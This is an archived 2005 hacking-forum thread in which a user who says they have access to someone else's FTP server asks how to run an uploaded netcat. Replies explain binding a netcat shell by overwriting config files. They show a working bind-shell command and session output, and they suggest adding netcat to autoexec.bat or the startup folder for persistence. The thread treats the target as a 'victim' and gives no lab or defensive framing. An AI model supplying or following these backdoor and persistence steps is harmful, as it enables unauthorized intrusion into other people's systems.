Follow us on Twitter!
Society leans ever heavily on computers, if you have the power to take out computers you can take out society. - cubeman372
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 27
Guests Online: 23
Members Online: 4

Registered Members: 82885
Newest Member: ConiBE
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Author

Putting in NetCat


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 15-12-05 23:07
Hello, If im inside someones ftp on hes web server and i upload netcat. How do i get it to execute?


Author

RE: Putting in NetCat

n3w7yp3
Member

Your avatar

Posts: 358
Location: USA
Joined: 19.03.05
Rank:
Moderate
Posted on 15-12-05 23:11
What OS is the server? Do you have write access outside the /pub directories?

But mostly, it depends on the OS. The best and eaisest way to do it is to try and overwrite a config file, replacing it with your own, preferably one that gets netcat to bind to a port and throw up a shell.


"Root is a state of mind" -- K0resh
Author

RE: Putting in NetCat


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 16-12-05 00:03
This is a bit off topic, but what exactly is a shell?




Edited by on 16-12-05 00:03
Author

RE: Putting in NetCat

Mr_Cheese




Posts: 2468
Location: Brighton, UK
Joined: 30.11.04
Rank:
Uber Elite
Posted on 16-12-05 00:48
[simple]
it is a tool that allows your to send commands to the computer.
[/simple]

A shell is a tool to enable users to interact with the system. Usually shells are text based and command line oriented and send commands that the kernal will understand.


http://www.hellboundhackers.org/
Author

RE: Putting in NetCat


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 16-12-05 01:37
in windows for example (very lame example and barely borders a shell) MS-DOS console.

thats more of a command line tho than a shell.

some OS's are nothing but a shell (WarDrivers Linux Assualt Kit Wink)


Author

RE: Putting in NetCat


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 16-12-05 01:50
Okay lets say the OS is windows, on an 2000 server and one on XP


Author

RE: Putting in NetCat


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 16-12-05 02:57
Ooh thanks Cheese i get it now Pfft!


Author

RE: Putting in NetCat


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 16-12-05 03:26
If you uploaded netcat on victim's computer , you can make your Netcat like a backdoor to open a port , connect to it and having fun :p
For example , let see this :
Code

E:\>nc -nvv -l -p 8080 -e cmd.exelistening on [any] 8080 ...connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error




and then connect to victim with port 8080
Code

C:\>nc -nvv 172.16.84.2 8080(UNKNOWN) [172.16.84.2] 8080 (?) openMicrosoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-1999 Microsoft Corp.E:\>cd testcd testE:\test>dir /wdir /w Volume in drive E has no label. Volume Serial Number is B465-452F Directory of E:\test[.]            [..]           head.log       NETUSERS.EXE   NetView.exentcrash.zip    password.txt   pwdump.exe               6 File(s)        262,499 bytes               2 Dir(s)     191,488,000 bytes freeC:\test>exitexitsent 20, rcvd 450: NOTSOCK




I just make this code not clear :)


Author

RE: Putting in NetCat

n3w7yp3
Member

Your avatar

Posts: 358
Location: USA
Joined: 19.03.05
Rank:
Moderate
Posted on 16-12-05 16:44
DeealerX9,

well, either edit autoexec.bat to call netcat, or put a batch file into the statup folder that calls netcat.

You'll need write access to these which i doubt you'll have over an FTP connection...


"Root is a state of mind" -- K0resh